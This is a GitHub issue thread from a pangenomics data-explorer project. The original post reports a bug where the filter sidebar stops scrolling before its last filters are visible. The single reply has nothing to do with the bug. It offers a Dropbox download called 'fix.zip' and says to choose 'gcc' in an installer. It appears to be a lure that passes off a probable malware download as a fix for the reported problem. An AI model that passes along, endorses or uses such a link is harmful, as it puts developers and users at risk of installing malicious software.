### ISSUE TITLE
Resolve scrolling issue in left-hand filters

### ISSUE THREAD

**Issue by hunterckx** [human-pangenomics/hprc-data-explorer#32]
When I try to scroll downward in the list of filters for raw sequencing data, the bottom of the scroll container is reached before the bottommost filters are visible -- this is a far as it goes:

<img width="1728" alt="Screenshot 2024-08-25 at 5 23 43 PM" src="https://github.com/user-attachments/assets/08b9a441-ae3f-41e0-b26b-ed322c0da220">

The cutoff for scrolling seems to be at the same place -- part way through the second ONT filter, as show in the screenshot -- regardless of the window height

**Comment by IvanJrX** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."
